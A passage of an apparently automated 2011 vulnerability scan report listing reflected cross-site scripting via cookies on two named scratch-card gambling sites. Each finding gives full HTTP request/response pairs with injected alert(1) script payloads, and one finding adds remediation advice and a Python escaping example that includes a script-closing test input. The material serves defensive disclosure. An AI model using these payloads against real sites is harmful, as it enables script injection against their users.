Cookie: affiliate=direct-173%7C193%7C214%7C243eb957"><script>alert(1)</script>c680567ffc0; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243eb957%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec680567ffc0; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243eb957"><script>alert(1)</script>c680567ffc0');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.192. http://scratch.co.uk/vis-club/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /vis-club/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49be4"><script>alert(1)</script>0ec361e9ffc was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP49be4"><script>alert(1)</script>0ec361e9ffc;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: currency=GBP49be4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0ec361e9ffc; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP49be4"><script>alert(1)</script>0ec361e9ffc', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.193. http://scratch.co.uk/vis-club/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /vis-club/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1c0"><script>alert(1)</script>3da4608a5ce was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGaa1c0"><script>alert(1)</script>3da4608a5ce; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: lang=ENGaa1c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3da4608a5ce; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGaa1c0"><script>alert(1)</script>3da4608a5ce', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.194. http://scratch.co.uk/winners/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /winners/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0b54"><script>alert(1)</script>fb6829eaf9d was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243a0b54"><script>alert(1)</script>fb6829eaf9d; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243a0b54%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efb6829eaf9d; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:04 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243a0b54"><script>alert(1)</script>fb6829eaf9d');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.195. http://scratch.co.uk/winners/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /winners/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a954"><script>alert(1)</script>f1743b981a4 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a954"><script>alert(1)</script>f1743b981a4;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: currency=GBP3a954%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef1743b981a4; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a954"><script>alert(1)</script>f1743b981a4', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.196. http://scratch.co.uk/winners/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /winners/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14a"><script>alert(1)</script>52273c4ddef was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG4e14a"><script>alert(1)</script>52273c4ddef; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG4e14a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52273c4ddef; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG4e14a"><script>alert(1)</script>52273c4ddef', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ead3"-alert(1)-"ff7a7bf1508 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the inline script that initialises strBonusOption from the cookie (see the response excerpt below). Because the value is lexed as JavaScript, a single double quote is enough to terminate the string literal and run attacker-controlled code; no angle brackets are required, so a filter that only HTML-encodes < and > would not stop it.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Two details in the response below weaken it: the application re-issues the cookie with domain=bigmoneyscratch.com and a three-year expiry, so a planted value is resent to the whole domain and its subdomains for that period, and a cookie scoped to the parent domain can be set from any host under it, which is the usual route to planting one.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must reach script, validate it against the small set of legitimate values (the values observed in this report are two-letter codes such as PM and FM) and emit it as a JavaScript string literal with quotes, backslashes and angle brackets escaped as \uXXXX sequences, so that a value containing </script> cannot end the script element either.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM9ead3"-alert(1)-"ff7a7bf1508; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: BO=FM9ead3"-alert(1)-"ff7a7bf1508; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9ead3"-alert(1)-"ff7a7bf1508";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...
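
Added example, not code from this report or from bigmoneyscratch.com, for the inline-script sink shown above. SCRIPT_TEMPLATE is a constructed stand-in for the script fragment in the response; BO_PAYLOAD is the canary from this finding; SCRIPT_CLOSER is a constructed input that the report did not test, used only to show why JSON-encoding on its own is not enough inside a script element. The checks split the markup where the HTML tokenizer would and strip string literals where the JavaScript lexer would, so the effect of each rendering is measured rather than assumed.

```python
"""Emitting a cookie value as a JavaScript string literal inside an inline <script> block."""
import json
import re

# Constructed stand-in for the script fragment quoted in the bigmoneyscratch.com responses.
SCRIPT_TEMPLATE = ('<script>\n'
                   'var strRegistrationMode = {mode};\n'
                   'var strBonusOption = {bonus};\n'
                   '</script>')

# Canary from issue 3.197, verbatim from the report.
BO_PAYLOAD = 'FM9ead3"-alert(1)-"ff7a7bf1508'
# Constructed input, not from the report: shows the script-element pitfall that JSON alone misses.
SCRIPT_CLOSER = 'FM</script><script>alert(1)</script>'


def render_vulnerable(mode, bonus):
    """The application's behaviour: the value is wrapped in double quotes and nothing else."""
    return SCRIPT_TEMPLATE.format(mode='"%s"' % mode, bonus='"%s"' % bonus)


def render_json_only(mode, bonus):
    """Common half-fix. json.dumps escapes quotes and backslashes, so "-alert(1)-" can no longer
    close the literal, but it leaves < and > alone, so </script> still ends the script element:
    the HTML tokenizer does not know or care about JavaScript quoting."""
    return SCRIPT_TEMPLATE.format(mode=json.dumps(mode), bonus=json.dumps(bonus))


def js_literal(value):
    """JSON-encode, then \\u-escape the characters the HTML parser cares about. \\u escapes are
    valid in any JS string literal and invisible to the HTML tokenizer. json.dumps already
    \\u-escapes all non-ASCII (including the U+2028/U+2029 line terminators) by default."""
    s = json.dumps(value)
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026')):
        s = s.replace(ch, esc)
    return s


def render_hardened(mode, bonus):
    return SCRIPT_TEMPLATE.format(mode=js_literal(mode), bonus=js_literal(bonus))


def script_elements(markup):
    """Split as the HTML tokenizer does: a script element ends at the first </script it meets,
    regardless of JavaScript quoting. Returns the script bodies found."""
    return re.findall(r'<script>(.*?)</script', markup, flags=re.S)


def outside_string_literals(js_source):
    """Blank out double-quoted string literals (honouring backslash escapes). Whatever remains is
    code the engine would execute; an injected value shows up here only if it broke out."""
    return re.sub(r'"(?:[^"\\]|\\.)*"', '""', js_source)


def roundtrips(value):
    """The hardened literal must still decode to exactly the original value."""
    return json.loads(js_literal(value)) == value


if __name__ == '__main__':
    body = script_elements(render_vulnerable('PM', BO_PAYLOAD))[0]
    print('alert(1)' in outside_string_literals(body))   # True: the canary runs as code
    body = script_elements(render_hardened('PM', BO_PAYLOAD))[0]
    print('alert(1)' in outside_string_literals(body))   # False: it stays inside the literal
    print(len(script_elements(render_json_only('PM', SCRIPT_CLOSER))))  # 2: JSON alone is beaten
    print(len(script_elements(render_hardened('PM', SCRIPT_CLOSER))))   # 1
```

The same escaping applies to any value written into a script block, including values that arrive via request parameters rather than cookies; an allow-list on the BO and RegistrationMode values is still the first line of defence.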

3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13162"-alert(1)-"7dddb484a1 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM13162"-alert(1)-"7dddb484a1; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM13162"-alert(1)-"7dddb484a1; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM13162"-alert(1)-"7dddb484a1";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Affiliates.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc676"-alert(1)-"4f238f33e1e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMdc676"-alert(1)-"4f238f33e1e; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: BO=FMdc676"-alert(1)-"4f238f33e1e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdc676"-alert(1)-"4f238f33e1e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Affiliates.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c517"-alert(1)-"53575243eb4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8c517"-alert(1)-"53575243eb4; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8c517"-alert(1)-"53575243eb4; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
